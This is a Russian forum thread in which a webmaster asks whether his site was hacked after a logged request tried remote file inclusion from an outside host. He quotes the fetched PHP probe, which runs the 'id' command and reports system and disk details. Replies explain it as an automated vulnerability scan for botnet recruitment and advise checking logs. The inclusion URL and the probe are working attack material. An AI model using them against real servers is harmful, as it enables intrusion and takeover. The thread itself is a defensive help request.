Punto hacK?

T
На сайте с 22.02.2008
Offline
141
1122

Добрый вечер уважаемые программисты и веб мастера, у меня проблема точнее подозрение на проблему, сегодня сайт посятил бот Punto, пришол он с http://index.php/?o=http://www.cap.org.hk/phpATM/cfg/id.txt?? или же индексировал это у меня на сайте, если хотите перейдите по ссылке но там вот что:

<?php

function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "angga<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "angga will dump your server..hahai<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Я не знаю как быть сделал сразу дамп базы и файлы копирнул сайта, что это такое? особенно меня волнует надпись angga will dump your server..hahai, поясните взламывают меня или уже взломали?

[Удален]
#1

тема хорошая + ник у вас шикарный

/me недоверяет ТСу

T
На сайте с 22.02.2008
Offline
141
#2

bearman, поэтому и не сделал ссылку активную я у вас помощи прошу а вы меня унижаете, тогда скажите что в php спрятано?

ps ник мог быть и другой я тут не из-за плохих или корыстных намерений, я прошу разъяснения и совета

dayw
На сайте с 25.01.2006
Offline
116
#3

имхо: если не ваше, то уже частично взломали и собирают инфу для полного взлома.

Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
[Удален]
#4

Troyan, информацию о твоем сервере сводную показывают

что за система, место свободное версия пхп и тп. ничего не копируют и не воруют, не ссыте)

T
На сайте с 22.02.2008
Offline
141
#5

bearman, да просто как то боязненно я ещё удивился почему punto bot + с какого то китайского сайта, значит отбой тревоге да?

arkadiy_a
На сайте с 11.06.2008
Offline
82
#6

Это обычная вещь для всех вебсайтов находящихся в индексе ПС. Время от времени на сайт заходят боты сканирующие на уязвимости, пытающиееся заэксплоитить уязвимость remote include. Если скрипт уязвим-он откликается кодовым словом, в Вашем случае это "angga<br>", добавляют Вас в логи, а затем Ваш сайт добавляется в зомбосеть, или (редко) не добавляется, если хостинг плох для хакеров (safe mode=off, исходящие сокеты запрещены, почту посылать нельзя или какой другой косяк для ботоводов)

Пройдитесь по логам, и посмотрите, уязвимы ли Ваши скрипты с теми параметрами что им сканнер пытался подсунуть. Ну и банальные принципы безопасности веб-программирования и веб-администрирования надо всегда соблюдать...

T
На сайте с 22.02.2008
Offline
141
#7

arkadiy_a, спасибо большое да safe mode=off отключен у меня, хостинг один из самых лушчих в Россие то есть мой сайт хотели добавить в зомбо сеть и оттуда например распростронять эксплойты и вирусы например так да?

arkadiy_a
На сайте с 11.06.2008
Offline
82
#8
Troyan:
мой сайт хотели добавить в зомбо сеть и оттуда например распростронять эксплойты и вирусы например так да?

Именно так.

Я ошибся. Надо читать наоборот: если safe mode=on то хостинг скорее (но необязательно) неинтересен хакерам, т.к. есть лимит 30 сек. на время выполнения скрипта (с дефолтными настройками вебсервера), обычно в safe mode=on вызовы юниксовых команд запрещены и требуется непрерывное соединение со скриптом на время выполнения, иначе он завершается преждевременно, т.е. уход в зомби будет осложнен ;)

ТС вы меня расстраивайте. Если вы хотите показать себя адекватным- выполните то что Вам написал:

"Пройдитесь по логам, и посмотрите, уязвимы ли Ваши скрипты с теми параметрами что им сканнер пытался подсунуть."
Напишите о результатах.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий